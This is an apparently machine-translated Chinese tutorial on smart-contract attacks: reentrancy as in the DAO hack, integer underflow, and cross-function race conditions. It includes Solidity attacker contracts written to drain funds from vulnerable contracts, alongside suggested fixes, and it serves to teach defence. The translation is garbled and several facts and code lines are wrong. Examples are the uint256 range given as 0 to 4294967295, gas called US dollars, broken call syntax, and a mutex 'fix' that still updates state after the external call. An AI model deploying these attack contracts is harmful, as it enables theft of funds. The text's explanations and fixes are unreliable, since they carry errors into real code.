如果你一直在跟蹤區(qū)塊鏈技術(shù),你可能聽說過一兩次智能合約攻擊,這些攻擊導致了價值數(shù)千萬美元的加密貨幣資產(chǎn)被盜。最引人注目的攻擊仍然是分散自治組織(DAO),它是加密貨幣史上最受期待的項目之一,也是智能合約革命能力的典型代表。雖然大多數(shù)人都聽說過這些攻擊事件,但很少有人真正了解到底出了什么問題,以及如何避免再犯兩次同樣的錯誤。
智能合約是動態(tài)的、復雜的、而且它強大到讓人難以置信。雖然它們的潛力是不可想象的,但它也不可能一出現(xiàn)就具備防范攻擊體制。這就是說,我們都應從以前的錯誤中學習,并共同成長。
盡管DAO已經(jīng)成為過去,但它仍然是開發(fā)人員、投資者和社區(qū)成員應該熟悉的容易受到智能合約攻擊的一個很好的例子。
無論您是開發(fā)人員、投資者還是加密貨幣愛好者,了解這些攻擊將使您對這項有前途的技術(shù)有更深的了解。
攻擊#1:重入
當攻擊者通過遞歸調(diào)用目標的退出函功能從目標中抽走資金時,就會發(fā)生重發(fā)式攻擊,DAO就是這種情況。當合約在發(fā)送資金前未能更新其狀態(tài)(用戶余額)時,攻擊者可以連續(xù)調(diào)用撤回功能來耗盡合約的資金。只要攻擊者接收到以太幣,攻擊者的合約就會自動調(diào)用它的撤回功能,該功能將會被寫入以再次調(diào)用撤回的算法中。此時攻擊已經(jīng)進入遞歸循環(huán),合約的資金開始向攻擊方轉(zhuǎn)移。由于目標合約被阻止調(diào)用攻擊者的撤回功能,該合約永遠不能更新攻擊者的數(shù)據(jù)。目標合約被騙得以為一切正常。需要說明的是,撤回功能是合約的本質(zhì)性功能,只要合約接收到以太幣和其他數(shù)據(jù),合約就會自動執(zhí)行它。
此次攻擊的流程
1、攻擊者向目標合約捐贈以太幣
2、目標合約更新攻擊者捐贈以太幣的余額
3、攻擊者要求返還資金
4、資金匯回
5、攻擊者的撤回功能是觸發(fā)器,并要求隨后退出
6、智能合約更新攻擊者平衡的邏輯尚未執(zhí)行,因此再次成功調(diào)用撤回
7、資金被發(fā)送到攻擊者
8、重復步驟5–7
9.一旦攻擊結(jié)束,攻擊者就會把合約上的資金送到他們的個人地址上去。
可重入攻擊的遞歸循環(huán)
不幸的是,一旦攻擊開始,就沒有辦法阻止它。攻擊者的撤回功能將被反復調(diào)用,直到合約用完或者受害者的以太幣被耗盡。
下面的代碼是易受影響的DAO合同的簡化版本,其中包含評論以更好地理解那些不熟悉編程/可靠性的合同。
contract babyDAO {
/* assign key/value pair so we can look up
credit integers with an ETH address */
mapping (address =》 uint256) public credit;
/* a function for funds to be added to the contract,
sender will be credited amount sent */
function donate(address to) payable {
credit[msg.sender] += msg.value;
}
/*show ether credited to address*/
function assignedCredit(address) returns (uint) {
return credit[msg.sender];
}
/*withdrawal ether from contract*/
function withdraw(uint amount) {
if (credit[msg.sender] 》= amount) {
msg.sender.call.value(amount)();
credit[msg.sender] -= amount;
}
}
}
如果我們看一下這個功能被提取,我們可以看到DAO聯(lián)系人使用address.call.value向msg.sender發(fā)送資金。不僅如此,合約還更新了資金發(fā)出后的信用狀態(tài)[msg.sender]。兩者都是大禁忌。認識到合約代碼中的這些漏洞,攻擊者可以使用類似合同的契約ThisAHodlUp{}來清算所有的合約DADO基金。
import ‘browser/babyDAO.sol’;
contract ThisIsAHodlUp {
/* assign babyDAO contract as “dao” */
babyDAO public dao = babyDAO(0x2ae.。.);
address owner;
/*assign contract creator as owner*/
constructor(ThisIsAHodlUp) public {
owner = msg.sender;
}
/*fallback function, withdraws funds from babyDAO*/
function() public {
dao.withdraw(dao.assignedCredit(this));
}
/*send drained funds to attacker’s address*/
function drainFunds() payable public{
owner.transfer(address(this).balance);
}
}
注意,撤回這一功能,調(diào)用的是DAO的撤銷功能,或合約的babyDAO{},以此來從合約中竊取資金。另一方面,在攻擊結(jié)束時,如果攻擊者想將所有被盜的以太幣發(fā)送到其地址,則會調(diào)用撤回功能。
解決之道
到目前為止,可以清楚地看到,重入攻擊利用了兩種特殊的智能合約漏洞。第一種是當合約的狀態(tài)在資金發(fā)送之后而不是之前更新。由于在發(fā)送資金之前沒有更新合同狀態(tài),功能可能在計算過程中被中斷,合約會被誘使認為資金還沒有實際發(fā)出。第二個漏洞是當合約錯誤地使用address.call.value來發(fā)送資金,而不是安全的錢包地址。transfer或address.send兩者都被限制在需要支付2300美元的津貼,但是僅僅記錄一個事件而不是多個外部調(diào)用。
發(fā)送資金前更新合約余額發(fā)送資金時使用address.transfer()或address.send()
contract babyDAO{
。..。
function withdraw(uint amount) {
if (credit[msg.sender] 》= amount) {
credit[msg.sender] -= amount; /* updates balance first */
msg.sender.send(amount)(); /* send funds properly */
}
}
攻擊2:Underflow
盡管DAO合約沒有成為底層流攻擊的受害者,我們可以利用現(xiàn)有的babyDAO合約{}來更好地理解是如何發(fā)生常見攻擊的。
首先,讓我們確認一下uint256是什么。Auint256是一個256位的無符號整數(shù)(因為只有正整數(shù))。Ethereum Virtual Machine設計為使用256位作為其字大小,或者一次性使用計算機的CPU處理的位數(shù)。由于EVM的大小限制為256位,分配的數(shù)字范圍為0到4294967295(22??)。如果我們看一下這個范圍,這個數(shù)字被重置到范圍的底部(22??+1=0)。如果我們進入這個范圍,這個數(shù)字被重置到范圍的頂端(0–1=22??)。
當我們從零減去一個大于零的數(shù)字時,就會產(chǎn)生一個新的整數(shù)22???,F(xiàn)在,如果攻擊者的平衡經(jīng)驗不足,余額將被更新,以便所有的資金都可能被盜。
此次攻擊流程
1、攻擊者通過向目標合約發(fā)送1 Wei發(fā)起攻擊
2、根據(jù)合約,寄件人應將款項匯入
3、隨后同一1 Wei的稱為
4、合約從寄件人的信用證中減去1 Wei,現(xiàn)在余額為零
5、因為目標合約將以太幣發(fā)送到攻擊者,所以攻擊者的撤回功能也將觸發(fā)并再次調(diào)用退出
6.退場記1 Wei
7.攻擊者的合約余額已經(jīng)更新了兩次,第一次更新為零,第二次更新為-1
8.攻擊者的平衡被重置為22??
9.攻擊者通過提取目標合同中的所有資金完成了攻擊
代碼
import ‘browser/babyDAO’;
contract UnderflowAttack {
babyDAO public dao = babyDAO(0x2ae…);
address owner;
bool performAttack = true;
/*set contract creator as owner*/
function UnderflowAttack{ owner = msg.sender;}
/*donate 1 wei, withdraw 1 wei*/
function attack() {
dao.donate.value(1)(this);
dao.withdraw(1);
}
/*fallback function, results in 0–1 = 2**256 */
function() {
if (performAttack) {
performAttack = false;
dao.withdraw(1);
}
}
/*extract balance from smart contract*/
function getJackpot() {
dao.withdraw(dao.balance);
owner.send(this.balance);
}
}
解決之道
為了避免成為下溢攻擊的受害者,最佳實踐是檢查更新后的整數(shù)是否保持在其字節(jié)范圍內(nèi)。我們可以在代碼中添加一個參數(shù)檢查,作為最后一道防線。該功取款第一行是提取檢查是否有足夠的資金,第二行檢查是否溢出,第三行檢查是否有下溢。
contract babysDAO{
。..。
/*withdrawal ether from contract*/
function withdraw(uint amount) {
if (credit[msg.sender] 》= amount
&& credit[msg.sender] + amount 》= credit[msg.sender]
&& credit[msg.sender] - amount 《= credit[msg.sender]) {
credit[msg.sender] -= amount;
msg.sender.send(amount)();
}
}
請注意,我們的上述代碼也會在發(fā)送資金之前更新用戶的余額,如前所述。
攻擊3:跨功能競態(tài)條件的攻擊
同樣重要的是,跨功能競態(tài)條件攻擊。正如我們在Reentrancy攻擊中所討論的,DAO合約未能正確地更新內(nèi)部合約狀態(tài),因此導致資金被盜。部分DAO和一般的外部調(diào)用問題是由于其跨功能競態(tài)條件所產(chǎn)生的。
而以太坊中的所有事務都是串聯(lián)運行的(一個接一個地運行),因此使用外部調(diào)用對另一份合約或另一個地址來說,一旦管理不當,就會災害連連。當兩個功能調(diào)用并共享同一狀態(tài)時,將發(fā)生跨功能競爭情況。該合約就會騙的消費者認為存在的是兩個合約,而實際上只有一個合約。因此,在這個合約的功能函數(shù)中,我們不能同時得到X=3和X=4。
讓我們用一個例子來說明這個概念。
攻擊與守則
contract crossFunctionRace{
mapping (address =》 uint) private userBalances;
/* uses userBalances to transfer funds */
function transfer(address to, uint amount) {
if (userBalances[msg.sender] 》= amount) {
userBalances[to] += amount;
userBalances[msg.sender] -= amount;
}
}
/* uses userBalances to withdraw funds */
function withdrawalBalance() public {
uint amountToWithdraw = userBalances[msg.sender];
require(msg.sender.send(amountToWithdraw)());
userBalances[msg.sender] = 0;
}
}
上述合約有兩個職能——一個負責轉(zhuǎn)移資金,另一個負責提取資金。讓我們假定攻擊者撤回功能傳輸(),同時進行外部撤回功能的退出Balance()。使用Balance[msg.sender]的狀態(tài)將被拉向兩個不同的方向。用戶的余額還沒有設置為0,但是攻擊者也能夠轉(zhuǎn)移資金,盡管它們已經(jīng)被撤回。在這種情況下合同允許攻擊者花費,區(qū)塊鏈技術(shù)的目的就是要解決其中的一個問題。
注意:如果這些合同共享狀態(tài),則跨多個合同可能會發(fā)生跨職能競爭條件。
1.在調(diào)用外部函數(shù)之前,首先完成所有內(nèi)部工作
2.避免打外線電話
3.在不可避免的情況下,將外部撤回功能標記為“不可信”
4.在不可避免的外部撤回時使用互斥體
根據(jù)下面的合約,我們可以看到一個合約的例子,1)。在打外部電話之前進行內(nèi)部工作、2),將所有外部調(diào)用函數(shù)標記為“不可信”。我們的合約允許資金被發(fā)送到一個地址,并允許用戶一次性獎勵最初將資金存入合約中的人。
contract crossFunctionRace{
mapping (address =》 uint) private userBalances;
mapping (address =》 uint) private reward;
mapping (address =》 bool) private claimedReward;
//makes external call, need to mark as untrusted
function untrustedWithdraw(address recipient) public {
uint amountWithdraw = userBalances[recipient];
reward[recipient] = 0;
require(recipient.call.value(amountWithdraw)());
}
//untrusted because withdraw is called, an external call
function untrustedGetReward(address recipient) public {
//check that reward hasn’t already been claimed
require(!claimedReward[recipient]);
//internal work first (claimedReward and assigning reward)
claimedReward = true;
reward[recipient] += 100;
untrustedWithdraw(recipient);
}
}
正如我們可以看到的,合約的第一個功能是在向用戶的合約地址發(fā)送資金時進行外部調(diào)用的。類似地,獎勵功能也使用撤回功能來發(fā)送一次性獎勵,因此也是不可信的。同樣重要的是,合約首先執(zhí)行所有內(nèi)部工作。與我們的可重入攻擊示例一樣,功能GetReward在允許退出以防止跨功能爭用的情況發(fā)生之前,授予用戶一次獎勵的信用。
在一個完美的世界里,智能合約不需要依靠外部調(diào)用。事實是,在許多情況下,外部聯(lián)通幾乎不可能發(fā)揮作用。因此,使用互斥體來“鎖定”某個狀態(tài),并只授予所有者更改狀態(tài)的能力,可以幫助避免代價高昂的災難。盡管互斥非常有效,但在用于多個合約時,它們可能會變得很棘手。如果您使用互斥體來保護不受各種條件的影響,那么您需要仔細確保沒有其他方法可以聲明鎖定,并且永遠不會被釋放。如果使用互斥方式,請確保您在與他們簽訂合約時已經(jīng)徹底了解了潛在的危險(死鎖、活鎖等)。
contract mutexExample{
mapping (address =》 uint) private balances;
bool private lockBalances;
function deposit() payable public returns (bool) {
/*check if lockBalances is unlocked before proceeding*/
require(!lockBalances);
/*lock, execute, unlock */
lockBalances = true;
balances[msg.sender] += msg.value;
lockBalances = false;
return true;
}
function withdraw(uint amount) payable public returns (bool) {
/*check if lockBalances is unlocked before proceeding*/
require(!lockBalances && amount 》 0 && balances[msg.sender]
》= amount);
/*lock, execute, unlock*/
lockBalances = true;
if (msg.sender.call(amount)()) {
balances[msg.sender] -= amount;
}
lockBalances = false;
return true;
}
}
上面我們可以看到合約mutexExample具有執(zhí)行功能存款和功能提取的私有鎖狀態(tài)。該鎖將阻止用戶在第一次調(diào)用完成之前成功地調(diào)用撤銷,從而防止出現(xiàn)任何類型的跨功能爭用狀態(tài)。
強大的力量同時帶來巨大的責任。盡管區(qū)塊鏈和智能合合約術(shù)仍在不斷發(fā)展,但風險仍然很高。攻擊者還沒有放棄尋找合適的機會,抓住設計糟糕的合約。
評論
查看更多